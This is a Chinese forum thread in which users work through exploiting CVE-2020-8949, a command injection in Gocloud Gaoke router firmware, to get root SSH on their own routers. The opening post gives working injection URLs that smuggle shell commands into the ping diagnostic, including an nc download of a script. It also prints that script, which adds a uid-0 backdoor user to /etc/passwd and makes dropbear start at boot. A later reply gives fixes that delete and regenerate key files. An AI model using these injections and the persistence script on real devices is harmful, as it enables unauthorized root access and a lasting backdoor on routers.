高恪5.2注入破解请教

lon9***

主要参考Gocloud高恪固件CVE-2020-8949漏洞利用打开SSH（poc支持5.2最新版测试通过）
底包版本:4.0.2.12651
功能包版本:5.2.0.19646 (漏洞确实存在)
记录几条命令:

1. reboot
   
2. http://192.168.1.1/cgi-bin/webui/admin/tools/app_ping/diag_ping/eth0%60reboot%60/5/6/a.com
   
3. nc 192.168.77.166 4444 > a.sh
   
4. http://192.168.1.1/cgi-bin/webui/admin/tools/app_ping/diag_ping/eth0%60nc%20192.168.1.166%204444%20%3E%20a.sh%60/5/6/a.com
   
5. ls -l (两种写法, 效果相同)
   
6. http://192.168.1.1/cgi-bin/webui/admin/tools/app_ping/diag_ping/eth0%60ls%20-l%60/5/6/a.com
   
7. http://192.168.1.1/cgi-bin/webui/admin/tools/app_ping/diag_ping/%20%3Bls%20-l%202%3E%261%3B%20/5/6/a.com
   
8. chmod +x a.sh
   
9. http://192.168.1.1/cgi-bin/webui/admin/tools/app_ping/diag_ping/eth0%60chmod%20%2Bx%20a.sh%60/5/6/a.com
   
10. http://192.168.1.1/cgi-bin/webui/admin/tools/app_ping/diag_ping/%20%3Bchmod%20%2Bx%20a.sh%202%3E%261%3B%20/5/6/a.com
    
11. sh a.sh
    
12. http://192.168.1.1/cgi-bin/webui/admin/tools/app_ping/diag_ping/%20%3Bsh%20%20a.sh%202%3E%261%3B%20/5/6/a.com
    

复制代码

a.sh的内容(完全照抄参考文):

1. 
   
2. #!/bin/sh
   
3. # ls -l /etc/dropbear
   
4. # ls -l /etc/init.d
   
5. # ls -l /etc/rc.d
   
6. # cat /etc/init.d/dropbear
   
7. # cat /etc/init.d/rcS
   
8. echo "Generate host key"
   
9. rm -rf /etc/dropbear/dropbear_rsa_host_key
   
10. rm -rf /etc/dropbear/dropbear_dss_host_key
    
11. /usr/bin/dropbearkey -t rsa -f /etc/dropbear/dropbear_rsa_host_key
    
12. /usr/bin/dropbearkey -t dss -f /etc/dropbear/dropbear_dss_host_key
    
13. # echo "Exec /etc/init.d/dropbear"
    
14. # chmod +x /etc/init.d/dropbear
    
15. # /etc/init.d/dropbear enable
    
16. # /etc/init.d/dropbear start
    
17. echo "Check host key"
    
18. ls -l /etc/dropbear
    
19. date
    
20. 
    
21. echo "Add User sumu password admin"
    
22. cat>>/etc/passwd<<EOF
    
23. sumu:\$1\$aLBvC2Ao\$E4V2uG3GNwhlWczjZXb.31:0:0:root:/root:/bin/ash
    
24. EOF
    
25. 
    
26. echo "Update /etc/rc.local"
    
27. cat>/etc/rc.local<<EOF
    
28. # Put your custom commands here that should be executed once
    
29. # the system init finished. By default this file does nothing.
    
30. # /etc/init.d/dropbear start
    
31. /usr/sbin/dropbear
    
32. exit 0
    
33. EOF
    
34. 
    
35. echo "Check /etc/rc.local"
    
36. cat /etc/rc.local
    
37. 
    
38. echo "Start dropbear"
    
39. dropbear

复制代码

执行脚本后得到了如下回显信息:

从 "Check host key" 步骤就开始出错了, 似乎路径不对..

请大侠指点

最新的5.2.0.20018漏洞似乎还没找到...

lon9***

漏洞确实存在, 就是dropbare的路径似乎不对
小白对命令行下破解操作实在是不熟悉
求大侠出手

8248***

好高级，我就想要个NAT1就好

bbs***

大佬能做个低版本的NAT1+去广告+违禁词语的吗？

lam***

破解后能开NAT1吗？

MJ***

没有dropbear二进制文件，根据错误来一个一个加就行了

zhc***

你开了SSH有什么作用，128的肯定没用，256的才行，但是你开了SSH在添加插件，支持多少个插件？
所以高恪开SSH没意义在那

coco***

新版本插件有编译好的吗,不然开Ssh没插件安装有什么用

wanga***

我就想要个NAT1就好

▓尐〖***

没有大神去弄,我等伸手党只能......

zhouli***

我可以开ssh 和nat1

zhouli***

我可以开ssh 和nat1

hua***

zhoulizhen09 发表于 2021-8-27 18:18
我可以开ssh 和nat1

你好，老哥，方便交流下吗

lcs***

主要是这里出问题了

1. rm -rf /etc/dropbear/dropbear_rsa_host_key
   
2. rm -rf /etc/dropbear/dropbear_dss_host_key
   
3. /usr/bin/dropbearkey -t rsa -f /etc/dropbear/dropbear_rsa_host_key
   
4. /usr/bin/dropbearkey -t dss -f /etc/dropbear/dropbear_dss_host_key

复制代码

在下的两个文件末尾自动带上了问号
我后面上传一个脚本

1. #!/bin/sh
   
2. rm -f /etc/dropbear/*

复制代码

把/etc/dropbear/下的文件全部删除，然后每次执行1次命令上传一次脚本

1. #!/bin/sh
   
2. /usr/bin/dropbearkey -t rsa -f /etc/dropbear/dropbear_rsa_host_key

复制代码

再次上传脚本

1. #!/bin/sh
   
2. /usr/bin/dropbearkey -t dss -f /etc/dropbear/dropbear_dss_host_key

复制代码

最后上传脚本

1. #!/bin/sh
   
2. dropbear

复制代码

ps 看进程里面有没有dropbear运行，有了就用root，你自己的密码登陆ssh就行了。

ton***

zhoulizhen09 发表于 2021-8-27 18:18
我可以开ssh 和nat1

老哥有没有联系方式